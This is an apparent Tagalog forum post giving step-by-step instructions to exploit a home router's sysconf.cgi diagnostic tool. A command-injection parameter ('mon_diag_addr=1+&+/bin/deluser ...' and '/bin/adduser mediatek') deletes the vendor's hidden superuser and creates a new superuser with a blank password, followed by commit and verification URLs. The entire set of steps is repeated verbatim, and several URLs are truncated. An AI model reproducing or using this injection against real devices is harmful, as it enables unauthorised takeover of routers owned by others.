eto na po steps
una, lagay nyo po ito sa URL
http://192.168.254.254/cgi-bin/sysc...ction=personalize_password&time=1434934507727
may lalabas po jan na kagaya neto
Successfully,u878mJAskqMd,Admin,user,enable,enable,enable,/www/power_user,/www/operator_user,/www/guest_user,
kapag nagamit nyo na po ang tool, pwedeng maging ganito lang results nyo sa paggamit ng unang url
Successfully,,Admin,user,enable,enable,enable,/www/power_user,/www/operator_user,/www/guest_user,
nadelete ang superuser pero hindi naset ng maayos si mediatek
merong tatlong url or exploit na nirrun sa tool
http://192.168.254.254/cgi-bin/sysc...0&mon_diag_addr=1+&+/bin/deluser u878mJAskqMd
-dinedelete nya si superuser na u878mJAskqMd
-/bin/deluser u878mJAskqMd
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1
-eto parang submit or commit function..
http://192.168.254.254/cgi-bin/sysc...ype=0&mon_diag_addr=1+&+/bin/adduser mediatek
-eto nagseset sya ng new superuser account
-/bin/adduser mediatek
hanggang dyan lang ang tool. kailangan isa pang run ng submit/commit function. eto yun:
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1
after nyan, check nyo nlng kung pumasok ang naadd nyo na user by using this:
http://192.168.254.254/cgi-bin/sysc...ction=personalize_password&time=1434934507727
dapat magdidisplay ang nilagay nyong user sa script, dito sa case na dito, mediatek, kayo na bahala mag modify ng URL para sa gusto nyong username.
ang password po ay blank
una, lagay nyo po ito sa URL
http://192.168.254.254/cgi-bin/sysc...ction=personalize_password&time=1434934507727
may lalabas po jan na kagaya neto
Successfully,u878mJAskqMd,Admin,user,enable,enable,enable,/www/power_user,/www/operator_user,/www/guest_user,
kapag nagamit nyo na po ang tool, pwedeng maging ganito lang results nyo sa paggamit ng unang url
Successfully,,Admin,user,enable,enable,enable,/www/power_user,/www/operator_user,/www/guest_user,
nadelete ang superuser pero hindi naset ng maayos si mediatek
merong tatlong url or exploit na nirrun sa tool
http://192.168.254.254/cgi-bin/sysc...0&mon_diag_addr=1+&+/bin/deluser u878mJAskqMd
-dinedelete nya si superuser na u878mJAskqMd
-/bin/deluser u878mJAskqMd
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1
-eto parang submit or commit function..
http://192.168.254.254/cgi-bin/sysc...ype=0&mon_diag_addr=1+&+/bin/adduser mediatek
-eto nagseset sya ng new superuser account
-/bin/adduser mediatek
hanggang dyan lang ang tool. kailangan isa pang run ng submit/commit function. eto yun:
http://192.168.254.254/cgi-bin/sysconf.cgi?page=ajax.asp&action=diagnostic_tools_start¬run=1
after nyan, check nyo nlng kung pumasok ang naadd nyo na user by using this:
http://192.168.254.254/cgi-bin/sysc...ction=personalize_password&time=1434934507727
dapat magdidisplay ang nilagay nyong user sa script, dito sa case na dito, mediatek, kayo na bahala mag modify ng URL para sa gusto nyong username.
ang password po ay blank
Last edited: